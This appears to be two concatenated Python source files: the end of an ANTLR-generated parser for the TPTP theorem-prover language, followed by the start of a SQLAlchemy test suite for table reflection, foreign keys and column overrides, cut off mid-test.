return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_termContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_formula_data
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFormula_data" ):
listener.enterFormula_data(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFormula_data" ):
listener.exitFormula_data(self)
def formula_data(self):
localctx = tptp_v7_0_0_0Parser.Formula_dataContext(self, self._ctx, self.state)
self.enterRule(localctx, 384, self.RULE_formula_data)
try:
self.state = 1606
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__38]:
self.enterOuterAlt(localctx, 1)
self.state = 1586
self.match(tptp_v7_0_0_0Parser.T__38)
self.state = 1587
self.thf_formula()
self.state = 1588
self.match(tptp_v7_0_0_0Parser.T__10)
pass
elif token in [tptp_v7_0_0_0Parser.T__39]:
self.enterOuterAlt(localctx, 2)
self.state = 1590
self.match(tptp_v7_0_0_0Parser.T__39)
self.state = 1591
self.tff_formula()
self.state = 1592
self.match(tptp_v7_0_0_0Parser.T__10)
pass
elif token in [tptp_v7_0_0_0Parser.T__40]:
self.enterOuterAlt(localctx, 3)
self.state = 1594
self.match(tptp_v7_0_0_0Parser.T__40)
self.state = 1595
self.fof_formula()
self.state = 1596
self.match(tptp_v7_0_0_0Parser.T__10)
pass
elif token in [tptp_v7_0_0_0Parser.T__41]:
self.enterOuterAlt(localctx, 4)
self.state = 1598
self.match(tptp_v7_0_0_0Parser.T__41)
self.state = 1599
self.cnf_formula()
self.state = 1600
self.match(tptp_v7_0_0_0Parser.T__10)
pass
elif token in [tptp_v7_0_0_0Parser.T__42]:
self.enterOuterAlt(localctx, 5)
self.state = 1602
self.match(tptp_v7_0_0_0Parser.T__42)
self.state = 1603
self.fof_term()
self.state = 1604
self.match(tptp_v7_0_0_0Parser.T__10)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class General_listContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def general_terms(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.General_termsContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_general_list
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterGeneral_list" ):
listener.enterGeneral_list(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitGeneral_list" ):
listener.exitGeneral_list(self)
def general_list(self):
localctx = tptp_v7_0_0_0Parser.General_listContext(self, self._ctx, self.state)
self.enterRule(localctx, 386, self.RULE_general_list)
try:
self.state = 1613
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__16]:
self.enterOuterAlt(localctx, 1)
self.state = 1608
self.match(tptp_v7_0_0_0Parser.T__16)
pass
elif token in [tptp_v7_0_0_0Parser.T__11]:
self.enterOuterAlt(localctx, 2)
self.state = 1609
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 1610
self.general_terms()
self.state = 1611
self.match(tptp_v7_0_0_0Parser.T__12)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class General_termsContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def general_term(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.General_termContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.General_termContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_general_terms
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterGeneral_terms" ):
listener.enterGeneral_terms(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitGeneral_terms" ):
listener.exitGeneral_terms(self)
def general_terms(self):
localctx = tptp_v7_0_0_0Parser.General_termsContext(self, self._ctx, self.state)
self.enterRule(localctx, 388, self.RULE_general_terms)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1615
self.general_term()
self.state = 1620
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==tptp_v7_0_0_0Parser.T__1:
self.state = 1616
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1617
self.general_term()
self.state = 1622
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class NameContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def atomic_word(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Atomic_wordContext,0)
def Integer(self):
return self.getToken(tptp_v7_0_0_0Parser.Integer, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_name
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterName" ):
listener.enterName(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitName" ):
listener.exitName(self)
def name(self):
localctx = tptp_v7_0_0_0Parser.NameContext(self, self._ctx, self.state)
self.enterRule(localctx, 390, self.RULE_name)
try:
self.state = 1625
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
self.enterOuterAlt(localctx, 1)
self.state = 1623
self.atomic_word()
pass
elif token in [tptp_v7_0_0_0Parser.Integer]:
self.enterOuterAlt(localctx, 2)
self.state = 1624
self.match(tptp_v7_0_0_0Parser.Integer)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Atomic_wordContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Lower_word(self):
return self.getToken(tptp_v7_0_0_0Parser.Lower_word, 0)
def Single_quoted(self):
return self.getToken(tptp_v7_0_0_0Parser.Single_quoted, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_atomic_word
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAtomic_word" ):
listener.enterAtomic_word(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAtomic_word" ):
listener.exitAtomic_word(self)
def atomic_word(self):
localctx = tptp_v7_0_0_0Parser.Atomic_wordContext(self, self._ctx, self.state)
self.enterRule(localctx, 392, self.RULE_atomic_word)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1627
_la = self._input.LA(1)
if not(_la==tptp_v7_0_0_0Parser.Lower_word or _la==tptp_v7_0_0_0Parser.Single_quoted):
self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Atomic_defined_wordContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Dollar_word(self):
return self.getToken(tptp_v7_0_0_0Parser.Dollar_word, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_atomic_defined_word
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAtomic_defined_word" ):
listener.enterAtomic_defined_word(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAtomic_defined_word" ):
listener.exitAtomic_defined_word(self)
def atomic_defined_word(self):
localctx = tptp_v7_0_0_0Parser.Atomic_defined_wordContext(self, self._ctx, self.state)
self.enterRule(localctx, 394, self.RULE_atomic_defined_word)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1629
self.match(tptp_v7_0_0_0Parser.Dollar_word)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Atomic_system_wordContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Dollar_dollar_word(self):
return self.getToken(tptp_v7_0_0_0Parser.Dollar_dollar_word, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_atomic_system_word
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAtomic_system_word" ):
listener.enterAtomic_system_word(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAtomic_system_word" ):
listener.exitAtomic_system_word(self)
def atomic_system_word(self):
localctx = tptp_v7_0_0_0Parser.Atomic_system_wordContext(self, self._ctx, self.state)
self.enterRule(localctx, 396, self.RULE_atomic_system_word)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1631
self.match(tptp_v7_0_0_0Parser.Dollar_dollar_word)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class NumberContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Integer(self):
return self.getToken(tptp_v7_0_0_0Parser.Integer, 0)
def Rational(self):
return self.getToken(tptp_v7_0_0_0Parser.Rational, 0)
def Real(self):
return self.getToken(tptp_v7_0_0_0Parser.Real, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_number
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterNumber" ):
listener.enterNumber(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitNumber" ):
listener.exitNumber(self)
def number(self):
localctx = tptp_v7_0_0_0Parser.NumberContext(self, self._ctx, self.state)
self.enterRule(localctx, 398, self.RULE_number)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1633
_la = self._input.LA(1)
if not(((((_la - 74)) & ~0x3f) == 0 and ((1 << (_la - 74)) & ((1 << (tptp_v7_0_0_0Parser.Real - 74)) | (1 << (tptp_v7_0_0_0Parser.Rational - 74)) | (1 << (tptp_v7_0_0_0Parser.Integer - 74)))) != 0)):
self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class File_nameContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Single_quoted(self):
return self.getToken(tptp_v7_0_0_0Parser.Single_quoted, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_file_name
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFile_name" ):
listener.enterFile_name(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFile_name" ):
listener.exitFile_name(self)
def file_name(self):
localctx = tptp_v7_0_0_0Parser.File_nameContext(self, self._ctx, self.state)
self.enterRule(localctx, 400, self.RULE_file_name)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1635
self.match(tptp_v7_0_0_0Parser.Single_quoted)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
def sempred(self, localctx:RuleContext, ruleIndex:int, predIndex:int):
if self._predicates == None:
self._predicates = dict()
self._predicates[18] = self.thf_or_formula_sempred
self._predicates[19] = self.thf_and_formula_sempred
self._predicates[20] = self.thf_apply_formula_sempred
self._predicates[42] = self.thf_xprod_type_sempred
self._predicates[43] = self.thf_union_type_sempred
self._predicates[54] = self.tff_or_formula_sempred
self._predicates[55] = self.tff_and_formula_sempred
self._predicates[85] = self.tff_xprod_type_sempred
self._predicates[94] = self.fof_or_formula_sempred
self._predicates[95] = self.fof_and_formula_sempred
self._predicates[122] = self.cnf_disjunction_sempred
pred = self._predicates.get(ruleIndex, None)
if pred is None:
raise Exception("No predicate with index:" + str(ruleIndex))
else:
return pred(localctx, predIndex)
def thf_or_formula_sempred(self, localctx:Thf_or_formulaContext, predIndex:int):
if predIndex == 0:
return self.precpred(self._ctx, 1)
def thf_and_formula_sempred(self, localctx:Thf_and_formulaContext, predIndex:int):
if predIndex == 1:
return self.precpred(self._ctx, 1)
def thf_apply_formula_sempred(self, localctx:Thf_apply_formulaContext, predIndex:int):
if predIndex == 2:
return self.precpred(self._ctx, 1)
def thf_xprod_type_sempred(self, localctx:Thf_xprod_typeContext, predIndex:int):
if predIndex == 3:
return self.precpred(self._ctx, 1)
def thf_union_type_sempred(self, localctx:Thf_union_typeContext, predIndex:int):
if predIndex == 4:
return self.precpred(self._ctx, 1)
def tff_or_formula_sempred(self, localctx:Tff_or_formulaContext, predIndex:int):
if predIndex == 5:
return self.precpred(self._ctx, 1)
def tff_and_formula_sempred(self, localctx:Tff_and_formulaContext, predIndex:int):
if predIndex == 6:
return self.precpred(self._ctx, 1)
def tff_xprod_type_sempred(self, localctx:Tff_xprod_typeContext, predIndex:int):
if predIndex == 7:
return self.precpred(self._ctx, 1)
def fof_or_formula_sempred(self, localctx:Fof_or_formulaContext, predIndex:int):
if predIndex == 8:
return self.precpred(self._ctx, 1)
def fof_and_formula_sempred(self, localctx:Fof_and_formulaContext, predIndex:int):
if predIndex == 9:
return self.precpred(self._ctx, 1)
def cnf_disjunction_sempred(self, localctx:Cnf_disjunctionContext, predIndex:int):
if predIndex == 10:
return self.precpred(self._ctx, 1)
|
py | b414e15ad4426866d21f1837fce0f6995730bd9c | import unicodedata
import sqlalchemy as sa
from sqlalchemy import DefaultClause
from sqlalchemy import FetchedValue
from sqlalchemy import ForeignKey
from sqlalchemy import Index
from sqlalchemy import inspect
from sqlalchemy import Integer
from sqlalchemy import MetaData
from sqlalchemy import schema
from sqlalchemy import sql
from sqlalchemy import String
from sqlalchemy import testing
from sqlalchemy import UniqueConstraint
from sqlalchemy.testing import assert_raises
from sqlalchemy.testing import assert_raises_message
from sqlalchemy.testing import AssertsCompiledSQL
from sqlalchemy.testing import ComparesTables
from sqlalchemy.testing import config
from sqlalchemy.testing import engines
from sqlalchemy.testing import eq_
from sqlalchemy.testing import eq_regex
from sqlalchemy.testing import expect_warnings
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import in_
from sqlalchemy.testing import is_true
from sqlalchemy.testing import mock
from sqlalchemy.testing import not_in_
from sqlalchemy.testing import skip
from sqlalchemy.testing.schema import Column
from sqlalchemy.testing.schema import Table
from sqlalchemy.util import ue
metadata, users = None, None
class ReflectionTest(fixtures.TestBase, ComparesTables):
__backend__ = True
@testing.exclude(
"mssql", "<", (10, 0, 0), "Date is only supported on MSSQL 2008+"
)
@testing.exclude("mysql", "<", (4, 1, 1), "early types are squirrely")
@testing.provide_metadata
def test_basic_reflection(self):
meta = self.metadata
users = Table(
"engine_users",
meta,
Column("user_id", sa.INT, primary_key=True),
Column("user_name", sa.VARCHAR(20), nullable=False),
Column("test1", sa.CHAR(5), nullable=False),
Column("test2", sa.Float(5), nullable=False),
Column("test3", sa.Text),
Column("test4", sa.Numeric(10, 2), nullable=False),
Column("test5", sa.Date),
Column(
"parent_user_id",
sa.Integer,
sa.ForeignKey("engine_users.user_id"),
),
Column("test6", sa.Date, nullable=False),
Column("test7", sa.Text),
Column("test8", sa.LargeBinary),
Column("test_passivedefault2", sa.Integer, server_default="5"),
Column("test9", sa.LargeBinary(100)),
Column("test10", sa.Numeric(10, 2)),
test_needs_fk=True,
)
addresses = Table(
"engine_email_addresses",
meta,
Column("address_id", sa.Integer, primary_key=True),
Column(
"remote_user_id", sa.Integer, sa.ForeignKey(users.c.user_id)
),
Column("email_address", sa.String(20)),
test_needs_fk=True,
)
meta.create_all()
meta2 = MetaData()
reflected_users = Table(
"engine_users", meta2, autoload=True, autoload_with=testing.db
)
reflected_addresses = Table(
"engine_email_addresses",
meta2,
autoload=True,
autoload_with=testing.db,
)
self.assert_tables_equal(users, reflected_users)
self.assert_tables_equal(addresses, reflected_addresses)
@testing.provide_metadata
def test_autoload_with_imply_autoload(self,):
meta = self.metadata
t = Table(
"t",
meta,
Column("id", sa.Integer, primary_key=True),
Column("x", sa.String(20)),
Column("y", sa.Integer),
)
meta.create_all()
meta2 = MetaData()
reflected_t = Table("t", meta2, autoload_with=testing.db)
self.assert_tables_equal(t, reflected_t)
@testing.provide_metadata
def test_two_foreign_keys(self):
meta = self.metadata
Table(
"t1",
meta,
Column("id", sa.Integer, primary_key=True),
Column("t2id", sa.Integer, sa.ForeignKey("t2.id")),
Column("t3id", sa.Integer, sa.ForeignKey("t3.id")),
test_needs_fk=True,
)
Table(
"t2",
meta,
Column("id", sa.Integer, primary_key=True),
test_needs_fk=True,
)
Table(
"t3",
meta,
Column("id", sa.Integer, primary_key=True),
test_needs_fk=True,
)
meta.create_all()
meta2 = MetaData()
t1r, t2r, t3r = [
Table(x, meta2, autoload=True, autoload_with=testing.db)
for x in ("t1", "t2", "t3")
]
assert t1r.c.t2id.references(t2r.c.id)
assert t1r.c.t3id.references(t3r.c.id)
@testing.provide_metadata
def test_resolve_fks_false_table(self):
meta = self.metadata
Table(
"t1",
meta,
Column("id", sa.Integer, primary_key=True),
Column("t2id", sa.Integer, sa.ForeignKey("t2.id")),
test_needs_fk=True,
)
Table(
"t2",
meta,
Column("id", sa.Integer, primary_key=True),
test_needs_fk=True,
)
meta.create_all()
meta2 = MetaData()
t1 = Table("t1", meta2, resolve_fks=False, autoload_with=testing.db)
in_("t1", meta2.tables)
not_in_("t2", meta2.tables)
assert_raises(
sa.exc.NoReferencedTableError,
lambda: list(t1.c.t2id.foreign_keys)[0].column,
)
t2 = Table("t2", meta2, autoload_with=testing.db)
# now it resolves
is_true(t1.c.t2id.references(t2.c.id))
@testing.provide_metadata
def test_resolve_fks_false_extend_existing(self):
meta = self.metadata
Table(
"t1",
meta,
Column("id", sa.Integer, primary_key=True),
Column("t2id", sa.Integer, sa.ForeignKey("t2.id")),
test_needs_fk=True,
)
Table(
"t2",
meta,
Column("id", sa.Integer, primary_key=True),
test_needs_fk=True,
)
meta.create_all()
meta2 = MetaData()
Table("t1", meta2)
in_("t1", meta2.tables)
t1 = Table(
"t1",
meta2,
resolve_fks=False,
autoload_with=testing.db,
extend_existing=True,
)
not_in_("t2", meta2.tables)
assert_raises(
sa.exc.NoReferencedTableError,
lambda: list(t1.c.t2id.foreign_keys)[0].column,
)
t2 = Table("t2", meta2, autoload_with=testing.db)
# now it resolves
is_true(t1.c.t2id.references(t2.c.id))
@testing.provide_metadata
def test_resolve_fks_false_metadata(self):
meta = self.metadata
Table(
"t1",
meta,
Column("id", sa.Integer, primary_key=True),
Column("t2id", sa.Integer, sa.ForeignKey("t2.id")),
test_needs_fk=True,
)
Table(
"t2",
meta,
Column("id", sa.Integer, primary_key=True),
test_needs_fk=True,
)
meta.create_all()
meta2 = MetaData()
meta2.reflect(testing.db, resolve_fks=False, only=["t1"])
in_("t1", meta2.tables)
not_in_("t2", meta2.tables)
t1 = meta2.tables["t1"]
assert_raises(
sa.exc.NoReferencedTableError,
lambda: list(t1.c.t2id.foreign_keys)[0].column,
)
meta2.reflect(testing.db, resolve_fks=False)
t2 = meta2.tables["t2"]
is_true(t1.c.t2id.references(t2.c.id))
def test_nonexistent(self):
meta = MetaData(testing.db)
assert_raises(
sa.exc.NoSuchTableError, Table, "nonexistent", meta, autoload=True
)
assert "nonexistent" not in meta.tables
@testing.provide_metadata
def test_include_columns(self):
meta = self.metadata
foo = Table(
"foo",
meta,
*[Column(n, sa.String(30)) for n in ["a", "b", "c", "d", "e", "f"]]
)
meta.create_all()
meta2 = MetaData(testing.db)
foo = Table(
"foo", meta2, autoload=True, include_columns=["b", "f", "e"]
)
# test that cols come back in original order
eq_([c.name for c in foo.c], ["b", "e", "f"])
for c in ("b", "f", "e"):
assert c in foo.c
for c in ("a", "c", "d"):
assert c not in foo.c
# test against a table which is already reflected
meta3 = MetaData(testing.db)
foo = Table("foo", meta3, autoload=True)
foo = Table(
"foo", meta3, include_columns=["b", "f", "e"], extend_existing=True
)
eq_([c.name for c in foo.c], ["b", "e", "f"])
for c in ("b", "f", "e"):
assert c in foo.c
for c in ("a", "c", "d"):
assert c not in foo.c
@testing.provide_metadata
def test_extend_existing(self):
meta = self.metadata
Table(
"t",
meta,
Column("id", Integer, primary_key=True),
Column("x", Integer),
Column("y", Integer),
Column("z", Integer, server_default="5"),
)
meta.create_all()
m2 = MetaData()
old_z = Column("z", String, primary_key=True)
old_y = Column("y", String)
old_q = Column("q", Integer)
t2 = Table("t", m2, old_z, old_q)
eq_(t2.primary_key.columns, (t2.c.z,))
t2 = Table(
"t",
m2,
old_y,
extend_existing=True,
autoload=True,
autoload_with=testing.db,
)
eq_(set(t2.columns.keys()), set(["x", "y", "z", "q", "id"]))
eq_(t2.primary_key.columns, (t2.c.id,))
assert t2.c.z is not old_z
assert t2.c.y is old_y
assert t2.c.z.type._type_affinity is Integer
assert t2.c.q is old_q
m3 = MetaData()
t3 = Table("t", m3, Column("z", Integer))
t3 = Table(
"t",
m3,
extend_existing=False,
autoload=True,
autoload_with=testing.db,
)
eq_(set(t3.columns.keys()), set(["z"]))
m4 = MetaData()
old_z = Column("z", String, primary_key=True)
old_y = Column("y", String)
old_q = Column("q", Integer)
t4 = Table("t", m4, old_z, old_q)
eq_(t4.primary_key.columns, (t4.c.z,))
t4 = Table(
"t",
m4,
old_y,
extend_existing=True,
autoload=True,
autoload_replace=False,
autoload_with=testing.db,
)
eq_(set(t4.columns.keys()), set(["x", "y", "z", "q", "id"]))
eq_(t4.primary_key.columns, (t4.c.id,))
assert t4.c.z is old_z
assert t4.c.y is old_y
assert t4.c.z.type._type_affinity is String
assert t4.c.q is old_q
@testing.provide_metadata
def test_extend_existing_reflect_all_dont_dupe_index(self):
m = self.metadata
d = Table(
"d",
m,
Column("id", Integer, primary_key=True),
Column("foo", String(50)),
Column("bar", String(50)),
UniqueConstraint("bar"),
)
Index("foo_idx", d.c.foo)
Table(
"b",
m,
Column("id", Integer, primary_key=True),
Column("aid", ForeignKey("d.id")),
)
m.create_all()
m2 = MetaData()
m2.reflect(testing.db, extend_existing=True)
eq_(
len(
[
idx
for idx in m2.tables["d"].indexes
if idx.name == "foo_idx"
]
),
1,
)
if (
# fmt: off
testing.requires.
unique_constraint_reflection_no_index_overlap.enabled
# fmt: on
):
eq_(
len(
[
const
for const in m2.tables["d"].constraints
if isinstance(const, UniqueConstraint)
]
),
1,
)
@testing.emits_warning(r".*omitted columns")
@testing.provide_metadata
def test_include_columns_indexes(self):
m = self.metadata
t1 = Table("t1", m, Column("a", sa.Integer), Column("b", sa.Integer))
sa.Index("foobar", t1.c.a, t1.c.b)
sa.Index("bat", t1.c.a)
m.create_all()
m2 = MetaData(testing.db)
t2 = Table("t1", m2, autoload=True)
assert len(t2.indexes) == 2
m2 = MetaData(testing.db)
t2 = Table("t1", m2, autoload=True, include_columns=["a"])
assert len(t2.indexes) == 1
m2 = MetaData(testing.db)
t2 = Table("t1", m2, autoload=True, include_columns=["a", "b"])
assert len(t2.indexes) == 2
@testing.provide_metadata
def test_autoload_replace_foreign_key_nonpresent(self):
"""test autoload_replace=False with col plus FK
establishes the FK not present in the DB.
"""
Table("a", self.metadata, Column("id", Integer, primary_key=True))
Table(
"b",
self.metadata,
Column("id", Integer, primary_key=True),
Column("a_id", Integer),
)
self.metadata.create_all()
m2 = MetaData()
b2 = Table("b", m2, Column("a_id", Integer, sa.ForeignKey("a.id")))
a2 = Table("a", m2, autoload=True, autoload_with=testing.db)
b2 = Table(
"b",
m2,
extend_existing=True,
autoload=True,
autoload_with=testing.db,
autoload_replace=False,
)
assert b2.c.id is not None
assert b2.c.a_id.references(a2.c.id)
eq_(len(b2.constraints), 2)
@testing.provide_metadata
def test_autoload_replace_foreign_key_ispresent(self):
"""test autoload_replace=False with col plus FK mirroring
DB-reflected FK skips the reflected FK and installs
the in-python one only.
"""
Table("a", self.metadata, Column("id", Integer, primary_key=True))
Table(
"b",
self.metadata,
Column("id", Integer, primary_key=True),
Column("a_id", Integer, sa.ForeignKey("a.id")),
)
self.metadata.create_all()
m2 = MetaData()
b2 = Table("b", m2, Column("a_id", Integer, sa.ForeignKey("a.id")))
a2 = Table("a", m2, autoload=True, autoload_with=testing.db)
b2 = Table(
"b",
m2,
extend_existing=True,
autoload=True,
autoload_with=testing.db,
autoload_replace=False,
)
assert b2.c.id is not None
assert b2.c.a_id.references(a2.c.id)
eq_(len(b2.constraints), 2)
@testing.provide_metadata
def test_autoload_replace_foreign_key_removed(self):
"""test autoload_replace=False with col minus FK that's in the
DB means the FK is skipped and doesn't get installed at all.
"""
Table("a", self.metadata, Column("id", Integer, primary_key=True))
Table(
"b",
self.metadata,
Column("id", Integer, primary_key=True),
Column("a_id", Integer, sa.ForeignKey("a.id")),
)
self.metadata.create_all()
m2 = MetaData()
b2 = Table("b", m2, Column("a_id", Integer))
a2 = Table("a", m2, autoload=True, autoload_with=testing.db)
b2 = Table(
"b",
m2,
extend_existing=True,
autoload=True,
autoload_with=testing.db,
autoload_replace=False,
)
assert b2.c.id is not None
assert not b2.c.a_id.references(a2.c.id)
eq_(len(b2.constraints), 1)
@testing.provide_metadata
def test_autoload_replace_primary_key(self):
Table("a", self.metadata, Column("id", Integer))
self.metadata.create_all()
m2 = MetaData()
a2 = Table("a", m2, Column("id", Integer, primary_key=True))
Table(
"a",
m2,
autoload=True,
autoload_with=testing.db,
autoload_replace=False,
extend_existing=True,
)
eq_(list(a2.primary_key), [a2.c.id])
def test_autoload_replace_arg(self):
Table("t", MetaData(), autoload_replace=False)
@testing.provide_metadata
def test_autoincrement_col(self):
"""test that 'autoincrement' is reflected according to sqla's policy.
Don't mark this test as unsupported for any backend !
"""
meta = self.metadata
Table(
"test",
meta,
Column("id", sa.Integer, primary_key=True),
Column("data", sa.String(50)),
mysql_engine="InnoDB",
)
Table(
"test2",
meta,
Column(
"id", sa.Integer, sa.ForeignKey("test.id"), primary_key=True
),
Column("id2", sa.Integer, primary_key=True),
Column("data", sa.String(50)),
mysql_engine="InnoDB",
)
meta.create_all()
m2 = MetaData(testing.db)
t1a = Table("test", m2, autoload=True)
assert t1a._autoincrement_column is t1a.c.id
t2a = Table("test2", m2, autoload=True)
assert t2a._autoincrement_column is None
@skip("sqlite")
@testing.provide_metadata
def test_unknown_types(self):
"""Test the handling of unknown types for the given dialect.
sqlite is skipped because it has special rules for unknown types using
'affinity types' - this feature is tested in that dialect's test spec.
"""
meta = self.metadata
t = Table("test", meta, Column("foo", sa.DateTime))
ischema_names = testing.db.dialect.ischema_names
t.create()
testing.db.dialect.ischema_names = {}
try:
m2 = MetaData(testing.db)
assert_raises(sa.exc.SAWarning, Table, "test", m2, autoload=True)
@testing.emits_warning("Did not recognize type")
def warns():
m3 = MetaData(testing.db)
t3 = Table("test", m3, autoload=True)
assert t3.c.foo.type.__class__ == sa.types.NullType
finally:
testing.db.dialect.ischema_names = ischema_names
@testing.provide_metadata
def test_basic_override(self):
meta = self.metadata
table = Table(
"override_test",
meta,
Column("col1", sa.Integer, primary_key=True),
Column("col2", sa.String(20)),
Column("col3", sa.Numeric),
)
table.create()
meta2 = MetaData(testing.db)
table = Table(
"override_test",
meta2,
Column("col2", sa.Unicode()),
Column("col4", sa.String(30)),
autoload=True,
)
self.assert_(isinstance(table.c.col1.type, sa.Integer))
self.assert_(isinstance(table.c.col2.type, sa.Unicode))
self.assert_(isinstance(table.c.col4.type, sa.String))
@testing.provide_metadata
def test_override_upgrade_pk_flag(self):
meta = self.metadata
table = Table(
"override_test",
meta,
Column("col1", sa.Integer),
Column("col2", sa.String(20)),
Column("col3", sa.Numeric),
)
table.create()
meta2 = MetaData(testing.db)
table = Table(
"override_test",
meta2,
Column("col1", sa.Integer, primary_key=True),
autoload=True,
)
eq_(list(table.primary_key), [table.c.col1])
eq_(table.c.col1.primary_key, True)
@testing.provide_metadata
def test_override_pkfk(self):
"""test that you can override columns which contain foreign keys
to other reflected tables, where the foreign key column is also
a primary key column"""
meta = self.metadata
Table(
"users",
meta,
Column("id", sa.Integer, primary_key=True),
Column("name", sa.String(30)),
)
Table(
"addresses",
meta,
Column("id", sa.Integer, primary_key=True),
Column("street", sa.String(30)),
)
meta.create_all()
meta2 = MetaData(testing.db)
a2 = Table(
"addresses",
meta2,
Column(
"id", sa.Integer, sa.ForeignKey("users.id"), primary_key=True
),
autoload=True,
)
u2 = Table("users", meta2, autoload=True)
assert list(a2.primary_key) == [a2.c.id]
assert list(u2.primary_key) == [u2.c.id]
assert u2.join(a2).onclause.compare(u2.c.id == a2.c.id)
meta3 = MetaData(testing.db)
u3 = Table("users", meta3, autoload=True)
a3 = Table(
"addresses",
meta3,
Column(
"id", sa.Integer, sa.ForeignKey("users.id"), primary_key=True
),
autoload=True,
)
assert list(a3.primary_key) == [a3.c.id]
assert list(u3.primary_key) == [u3.c.id]
assert u3.join(a3).onclause.compare(u3.c.id == a3.c.id)
@testing.provide_metadata
def test_override_nonexistent_fk(self):
"""test that you can override columns and create new foreign
keys to other reflected tables which have no foreign keys. this
is common with MySQL MyISAM tables."""
meta = self.metadata
Table(
"users",
meta,
Column("id", sa.Integer, primary_key=True),
Column("name", sa.String(30)),
)
Table(
"addresses",
meta,
Column("id", sa.Integer, primary_key=True),
Column("street", sa.String(30)),
